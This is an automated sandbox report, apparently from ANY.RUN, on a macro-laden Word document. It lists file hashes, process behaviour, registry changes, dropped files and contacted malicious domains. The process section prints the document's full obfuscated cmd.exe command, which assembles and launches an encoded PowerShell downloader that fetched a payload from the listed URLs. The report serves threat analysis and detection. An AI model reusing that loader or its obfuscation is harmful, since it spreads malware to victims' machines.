analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

wirus.doc

Full analysis: https://app.any.run/tasks/e1d08e50-ca1e-440e-8f75-962b8d324e83
Verdict: Malicious activity
Analysis date: February 10, 2019, 21:47:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: 88962Yvezhoxadaeval63712, Subject: 72548Yvezhoxadaevalog72682, Author: 94110Yvezhox43685, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Jun 4 20:41:00 2018, Last Saved Time/Date: Mon Jun 4 20:41:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

124D03B86227BBF282F0F567AE11858E

SHA1:

9F6325EBCE797B5CEEC1BBF32E61AEC8FBE8B650

SHA256:

C932D54A9EF3C645A28B7D8DE9747FC6C06FC23C6D65C036DA4EAE4D778A81DB

SSDEEP:

1536:a4oOX0z2Bd4X270+agA5mvjfr4u0w8cW1SPY/COwVm:dXs20XvijfrR0clPY/uV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • Cmd.exe (PID: 4072)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2940)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2940)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2260)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2260)
    • Executes application which crashes

      • powershell.exe (PID: 2260)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2940)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Category: 89975Yvezhoxad55394
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: 44461Yvezh85571
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2018:06:04 19:41:00
CreateDate: 2018:06:04 19:41:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: 94110Yvezhox43685
Subject: 72548Yvezhoxadaevalog72682
Title: 88962Yvezhoxadaeval63712
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2940"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\wirus.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4072Cmd BcGtnWEioCVEM lKkOETALpfZGZfiwTsEkvmrHnUz LZBKFRWZwF & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %uopnaUhzEDFEBLH%=qYsGRwCo&&set %PZflvBR%=p&&set %awozRZMKwpdapL%=o^w&&set %dGXwUhIJzOwPvIL%=aqPuRGXqCw&&set %uRcbMkiXYFU%=!%PZflvBR%!&&set %bwjrovmAJUzkdWu%=FnMsLiNVjbiIXX&&set %VXsVrCz%=e^r&&set %fjYRtGujOz%=!%awozRZMKwpdapL%!&&set %XUpMbfY%=s&&set %ijuWGJcIZDduwqZ%=NtzVBkdKmtkLL&&set %XFPfUwGwP%=he&&set %WjCMOLDYKNDfas%=ll&&!%uRcbMkiXYFU%!!%fjYRtGujOz%!!%VXsVrCz%!!%XUpMbfY%!!%XFPfUwGwP%!!%WjCMOLDYKNDfas%! -e IAAoACAAbgBFAHcALQBPAGIASgBlAGMAdAAgAEkAbwAuAFMAVABSAGUAQQBtAHIAZQBBAGQARQByACgAIAAoACAAbgBFAHcALQBPAGIASgBlAGMAdAAgAFMAeQBTAHQARQBtAC4ASQBvAC4AQwBPAG0AcABSAGUAcwBzAGkATwBuAC4AZABlAEYAbABBAFQAZQBzAFQAUgBFAEEAbQAoAFsASQBPAC4ATQBlAE0AbwByAFkAcwB0AFIAZQBBAE0AXQBbAHMAWQBzAHQAZQBNAC4AYwBPAE4AVgBlAHIAVABdADoAOgBGAFIAbwBtAGIAQQBzAGUANgA0AHMAVABSAGkATgBnACgAIAAnAFAAVgBKAHQAYQA5AHMAdwBFAFAANQBlADIASAA4AFEAdwBWAFEAeQBiAHEAUwBrADIAVwBEAEUARABOAG8AbQBqAEcAWQBMAEcAYwBQAEwAdQBzAEkAKwBXAEoAYQBWAFcATABFAHQAcABiAGIAYQBKAG8AVAA4ADkAOQAwADUAVwBRAHgAMwBPAHUAUABuADUAWAB5AG4AdwBMAFkAeQBsADIAMQBPAHYAcABCAHIAUgBpADIATgBxAEsAWQBSAG8AKwA5AFEAOQBGADIAMgAwAFkAcQBHAEUAZgBVADAASgBJADIAMAB1AGEAdgBqADQAUABsADUAQwBWAGcATwBXAEEAQQBpAGoAdABFACsARgBDADYARABCAEgAQwBBAGgAaQBUAFoAdAAxADcAWABmAEsARQA5AGYAOQBMAFoAcABEAEwAYQArAGoAaABZAEoAQQAvAEEARABNADYARwAzAE8AcQBkAFoAOABNAEIAUABEAGYAawA5AHYAUAB0AGMARABRAEsANAArAEIAKwBPAHYAawBEAEkARQBZAC8AWABJAEYAZQBBAGUARQA5AHAATwAwAFkAawBoAEMAdABoAEsATgBHAE4ALwB3AEEAWQBTAEIAVQBJAFgAbQBPAHYAUQBpAEkAdwBmADQAYgA1AEYATABjAFgAZABoAGIAeQBHAE0AaABYAEEAbQBuADcASAByAHUAMQA2AFoARQBJAFMAOAA1ADAAcwA5AHkASwBDAHQAKwB5ADQAOQB1AE8ATQBEAC8ATwBpAGsAQQB2AFIAMgBMAHMAMwBaAFIAdgBoAHUAcgAxADYAKwBtAHkAagB0AGkAeAB4AEsAZgA4AHUAKwB0AHUARQBNAGsAdQBGAGgAcABVAFcALwBmAE4AZABwADQAMQAxAHcAYwBhAG0ASABuADgAeABlAG8AZABoAEMAUABGAGUAcgA5AGQANwBnAFkAMQBNAGoAYQBkAE4AUgBUAGYAeAB2AEYARgBUAEQAbgA4AEwASgBjADUAVQBNADQAMQBqADgANwBiAE0AaQBUAGIAVwBVADgAQQB3ADAAWQBXAGoASwBkADQARwBDADEAZgBSAHQAdgBYADcAUABLAEsAQgBJAFIAKwBwAGQAQwA3AG0AWQBlAEUAYwBZAG8ATgBxAEoAMwB1AEUAdwBOAGwASgBWAHIAdABGAFEARgBDADIAUwA3AFUAcwBSAFkAMABnADAAKwBQAFAAaABtAGYAOABBAE4AOAA5ADcAVQBwAFUAKwAyAFMAbgAvAEkALwBPAHMAcwByAFgAVAB2AEIATwBXADkAWAB5ADcAeABUAFcAcgBTAHgAYgByAEgAdwBoAHUAQwAzAG0ARgA4AEQAUQBZAHoAdgBEAHQAdgBEAGgAMQBLAHYAQgBTADYAUAA4AE0ATgA2AFIAbwB1AEIARAB2AEIATQBqAEEAdAA0ADYATwBTAFgAaABXAEgANAAvAEUAZgAnACAAKQAgACwAWwBzAHkAcwB0AEUAbQAuAEkATwAuAGMAbwBNAFAAUgBlAFMAcwBpAG8ATgAuAGMATwBNAFAAcgBFAHMAcwBJAG8ATgBNAG8AZABFAF0AOgA6AGQARQBjAE8ATQBwAHIAZQBzAHMAKQAgACkAIAAsAFsAUwB5AFMAVABlAG0ALgB0AEUAeAB0AC4AZQBuAGMAbwBkAEkAbgBnAF0AOgA6AEEAcwBDAGkAaQApACAAKQAuAFIARQBhAGQAdABPAEUATgBEACgAIAApAHwAIAAmACgAKABHAFYAIAAnACoAbQBEAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoATwBpAG4AJwAnACkAC:\Windows\system32\Cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2260powershell -e IAAoACAAbgBFAHcALQBPAGIASgBlAGMAdAAgAEkAbwAuAFMAVABSAGUAQQBtAHIAZQBBAGQARQByACgAIAAoACAAbgBFAHcALQBPAGIASgBlAGMAdAAgAFMAeQBTAHQARQBtAC4ASQBvAC4AQwBPAG0AcABSAGUAcwBzAGkATwBuAC4AZABlAEYAbABBAFQAZQBzAFQAUgBFAEEAbQAoAFsASQBPAC4ATQBlAE0AbwByAFkAcwB0AFIAZQBBAE0AXQBbAHMAWQBzAHQAZQBNAC4AYwBPAE4AVgBlAHIAVABdADoAOgBGAFIAbwBtAGIAQQBzAGUANgA0AHMAVABSAGkATgBnACgAIAAnAFAAVgBKAHQAYQA5AHMAdwBFAFAANQBlADIASAA4AFEAdwBWAFEAeQBiAHEAUwBrADIAVwBEAEUARABOAG8AbQBqAEcAWQBMAEcAYwBQAEwAdQBzAEkAKwBXAEoAYQBWAFcATABFAHQAcABiAGIAYQBKAG8AVAA4ADkAOQAwADUAVwBRAHgAMwBPAHUAUABuADUAWAB5AG4AdwBMAFkAeQBsADIAMQBPAHYAcABCAHIAUgBpADIATgBxAEsAWQBSAG8AKwA5AFEAOQBGADIAMgAwAFkAcQBHAEUAZgBVADAASgBJADIAMAB1AGEAdgBqADQAUABsADUAQwBWAGcATwBXAEEAQQBpAGoAdABFACsARgBDADYARABCAEgAQwBBAGgAaQBUAFoAdAAxADcAWABmAEsARQA5AGYAOQBMAFoAcABEAEwAYQArAGoAaABZAEoAQQAvAEEARABNADYARwAzAE8AcQBkAFoAOABNAEIAUABEAGYAawA5AHYAUAB0AGMARABRAEsANAArAEIAKwBPAHYAawBEAEkARQBZAC8AWABJAEYAZQBBAGUARQA5AHAATwAwAFkAawBoAEMAdABoAEsATgBHAE4ALwB3AEEAWQBTAEIAVQBJAFgAbQBPAHYAUQBpAEkAdwBmADQAYgA1AEYATABjAFgAZABoAGIAeQBHAE0AaABYAEEAbQBuADcASAByAHUAMQA2AFoARQBJAFMAOAA1ADAAcwA5AHkASwBDAHQAKwB5ADQAOQB1AE8ATQBEAC8ATwBpAGsAQQB2AFIAMgBMAHMAMwBaAFIAdgBoAHUAcgAxADYAKwBtAHkAagB0AGkAeAB4AEsAZgA4AHUAKwB0AHUARQBNAGsAdQBGAGgAcABVAFcALwBmAE4AZABwADQAMQAxAHcAYwBhAG0ASABuADgAeABlAG8AZABoAEMAUABGAGUAcgA5AGQANwBnAFkAMQBNAGoAYQBkAE4AUgBUAGYAeAB2AEYARgBUAEQAbgA4AEwASgBjADUAVQBNADQAMQBqADgANwBiAE0AaQBUAGIAVwBVADgAQQB3ADAAWQBXAGoASwBkADQARwBDADEAZgBSAHQAdgBYADcAUABLAEsAQgBJAFIAKwBwAGQAQwA3AG0AWQBlAEUAYwBZAG8ATgBxAEoAMwB1AEUAdwBOAGwASgBWAHIAdABGAFEARgBDADIAUwA3AFUAcwBSAFkAMABnADAAKwBQAFAAaABtAGYAOABBAE4AOAA5ADcAVQBwAFUAKwAyAFMAbgAvAEkALwBPAHMAcwByAFgAVAB2AEIATwBXADkAWAB5ADcAeABUAFcAcgBTAHgAYgByAEgAdwBoAHUAQwAzAG0ARgA4AEQAUQBZAHoAdgBEAHQAdgBEAGgAMQBLAHYAQgBTADYAUAA4AE0ATgA2AFIAbwB1AEIARAB2AEIATQBqAEEAdAA0ADYATwBTAFgAaABXAEgANAAvAEUAZgAnACAAKQAgACwAWwBzAHkAcwB0AEUAbQAuAEkATwAuAGMAbwBNAFAAUgBlAFMAcwBpAG8ATgAuAGMATwBNAFAAcgBFAHMAcwBJAG8ATgBNAG8AZABFAF0AOgA6AGQARQBjAE8ATQBwAHIAZQBzAHMAKQAgACkAIAAsAFsAUwB5AFMAVABlAG0ALgB0AEUAeAB0AC4AZQBuAGMAbwBkAEkAbgBnAF0AOgA6AEEAcwBDAGkAaQApACAAKQAuAFIARQBhAGQAdABPAEUATgBEACgAIAApAHwAIAAmACgAKABHAFYAIAAnACoAbQBEAHIAKgAnACkALgBuAGEATQBlAFsAMwAsADEAMQAsADIAXQAtAGoATwBpAG4AJwAnACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3368"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\system32\ntvdm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Exit code:
3221225477
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 170
Read events
1 054
Write events
112
Delete events
4

Modification events

(PID) Process:(2940) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:?m/
Value:
3F6D2F007C0B0000010000000000000000000000
(PID) Process:(2940) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2940) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2940) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1313472533
(PID) Process:(2940) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313472652
(PID) Process:(2940) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1313472653
(PID) Process:(2940) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
7C0B0000C6001E4E8AC1D40100000000
(PID) Process:(2940) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:6o/
Value:
366F2F007C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2940) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:6o/
Value:
366F2F007C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2940) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
2
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6D9F.tmp.cvr
MD5:
SHA256:
2260powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XTI08MPVM9MVNGW215QE.temp
MD5:
SHA256:
3368ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs981A.tmp
MD5:
SHA256:
3368ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs982B.tmp
MD5:
SHA256:
2260powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2940WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D54EF75E542155A03DAEF5B6D413EEBB
SHA256:562D35F242B53183D0D079C1C1AD18E899707440C8E0659262664879D6B869B7
2260powershell.exeC:\Users\Public\254040.exehtml
MD5:7298DED6E2042E6262492D222A8FF670
SHA256:5694719FC073DFA7EC99D71157E089C72BB9C98CCDCD92CE735BE2FACE7E9031
2260powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF248117.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$wirus.docpgc
MD5:E18A1BA09BBEC78FAA010C6961411764
SHA256:A8D1BF79A2C24A3ECC672AC472C0C88C3DF6ED5AE02A5EDC2F3D65DD66DBB95A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
8
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2260
powershell.exe
GET
302
112.78.117.29:80
http://okane-mikata.com/Va4o10w/
JP
html
208 b
malicious
2260
powershell.exe
GET
302
192.254.183.52:80
http://nancysartor.com/nLLqxHl/
US
html
271 b
malicious
2260
powershell.exe
GET
404
81.169.145.82:80
http://samoticha.de/0yJk/
DE
html
203 b
malicious
2260
powershell.exe
GET
200
192.254.183.52:80
http://davidsartor.com/
US
html
9.88 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2260
powershell.exe
202.254.234.135:443
okane-mikata.jp
SAKURA Internet Inc.
JP
malicious
2260
powershell.exe
112.78.117.29:80
okane-mikata.com
SAKURA Internet Inc.
JP
suspicious
2260
powershell.exe
81.169.145.82:80
samoticha.de
Strato AG
DE
malicious
2260
powershell.exe
148.66.136.122:443
hkwineguild.com
GoDaddy.com, LLC
SG
malicious
2260
powershell.exe
192.254.183.52:80
nancysartor.com
Unified Layer
US
suspicious

DNS requests

Domain
IP
Reputation
samoticha.de
  • 81.169.145.82
malicious
okane-mikata.com
  • 112.78.117.29
malicious
okane-mikata.jp
  • 202.254.234.135
malicious
hkwineguild.com
  • 148.66.136.122
malicious
nancysartor.com
  • 192.254.183.52
malicious
davidsartor.com
  • 192.254.183.52
malicious

Threats

No threats detected
No debug info